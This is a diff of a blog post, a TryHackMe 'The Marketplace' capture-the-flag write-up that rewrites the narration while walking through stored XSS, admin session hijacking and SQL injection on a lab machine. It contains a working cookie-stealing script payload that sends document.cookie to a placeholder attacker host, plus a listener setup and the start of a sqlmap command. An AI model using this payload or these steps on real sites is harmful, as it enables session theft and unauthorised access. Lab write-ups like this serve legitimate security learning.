Throupy/staticblog/content/blog/2023-07-05-tryhackme-the-marketplace-writeup.md

 ...
 ```

-F﻿rom this we can see that there is a web server running on the machine, as well and an OpenSSH instance.
-Let's start by taking a look at the web page .by navigating to `http://10.10.15.67` in a browser
+Upon analysis, I discovered an OpenSSH instance and a web server running nginx 1.19.2.
+Curiosity led me to explore the website hosted on <http://10.10.15.67>.

+## Website Exploration

 ![](/img/webpage.png)

-T﻿he website seems to be some sort of online marketplace (surprise, surprise).
-Poking around on the website uncovers the ability to log in or sign up to create an account.
-After signing up and logging in, there were some new options available to me: the ability to create a listing, and to view messages for my account.
-As well as this, there was a session cookie created with the name `token`.
-These session cookies are used by the browser in order to tell what user is logged in, in order to show them the correct content on the page.
+The website appeared to be an online marketplace.
+After signing up and logging in, I gained access to additional features, such as creating listings and viewing messages.
+I also noticed the presence of a session cookie named "token," which helps the browser identify the logged-in user in order to display personalized content based on user access level (for example).

+## Exploiting XSS Vulnerability

-I﻿f we can somehow replace our own session token with one of an administrator or high-level user, we will likely be able to have some administrative options which may help us obtain a reverse shell on the machine.
-Let's try creating a listing.
-On the listing creation page, there is a simple form to input the title and content of the listing, we can try testing for XSS vulnerabilities by attempting to embed a textarea element into the page (in the content field).
-When we then view the listing, and a textarea field is present, we know that the site is vulnerable to XSS injection.
+My objective was to replace my session token with that of an administrator or a high-level user.
+By doing so, I hoped to unlock administrative options and potentially achieve a reverse shell on the target machine.
+To test for XSS vulnerabilities, I experimented by embedding a textarea element in the content field while creating a listing.
+If the website rendered the textarea field when viewing the listing, it would indicate a vulnerability to XSS injection.

 ![](/img/textarea.png)

 ![](/img/textareaworking.png)

+## Exploiting XSS and Cookie Stealing

-W﻿ith an XSS vulnerability present, we can create a malicious listing that will steal the user's cookie and send it to our web server (which we will set up shortly).
-When we use the "report listing to administrator" function on the website, the THM machine will automatically mimic an administrator navigating to the listing.
-With this, we will be able to steal their cookie.
+Utilizing the identified XSS vulnerability, I crafted a malicious listing capable of stealing the user's cookie and sending it to my web server (which I will set up shortly).
+Leveraging the "report listing to administrator" function, the THM machine simulated an administrator visiting the listing, allowing me to capture their cookie.

 F﻿irst, the cookie stealing payload:

 > `<script>fetch('http://<YOUR_MACHINE_IP>:8000/steal?cookie='+btoa(document.cookie));</script>`

-T﻿hen, the setup of the web server using python:
+To capture the stolen cookies, I set up a web server using Python on port 8000.
+The server listened for incoming requests and logged any stolen cookies.

 ```shell
 $ python3 -m http.server
 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
 ```

-N﻿ow, let's submit the listing, and report it to the administrators.
+Next, I submitted the listing, and reported it to the administrators.

 ![](/img/listing.png)

 ![](/img/reported.png)

-I﻿f we look in our web server console, sure enough we got the cookie!
-We will need to base64 decode the cookie into order to get the administrator's token.
+When I looked in my web server, sure enough, I got the cookie!
+I then decoded it using the base64 tool in order to retrieve the decoded token.

 ![](/img/gotcookie.png)

-W﻿e can replace our token cookie with the administrator token by using any firefox or chrome "cookie editor" extension, and then reload the page.
+## Replacing Cookies and Gaining Access

-U﻿pon reloading the page, we are presented with another navbar link: "administration panel", which gives us a list of all of the current users in the application.
-We can click on these links and go to each individual user page, notice the URL parameters when fetching a user:
+With the administrator's cookie successfully captured, I used a Firefox or Chrome "cookie editor" extension to replace my token cookie with the administrator's token.
+After reloading the page, a new navbar link appeared, granting me access to the "administration panel," which provided a comprehensive list of all users in the application.
+I could click on each user's link, observing the URL parameters, which were presumably used to query an SQL database on the backend and retrieve user information.

 > **`h﻿ttp://10.10.15.67/admin?user=1`**

-T﻿he URL parameters are likely being used to query an SQL database and retrieve information about the user with the corresponding ID passed within the URL.
-After some playing around, I managed to get the application to give a MySQL syntax error, meaning that an SQL injection is present.
+After some playing around, I managed to get the application to give a MySQL syntax error, meaning that an SQL injection vulnerability was present.
 Time for SQLMap!

-I﻿ won't dive into the details of the SQLMap tool in this writeup, as there are plenty of resources online.
-One thing to note is that you need to make sure you pass the cookie value to the tool when using it.
-Also ensure to use the delay argument, as not having it there meant that it didn't work (for me, at least).
+## Exploiting SQL Injection

+Recognizing the presence of an SQL injection vulnerability, I decided to utilize the SQLMap tool.
+I supplied the captured cookie value for authentication and included the delay argument to ensure successful exploitation of the vulnerability. (for some reason, without the delay argument, SQLMap did not work as expected)

 ```shell
 $ sqlmap -u "http://10.10.15.67/admin?user=3" \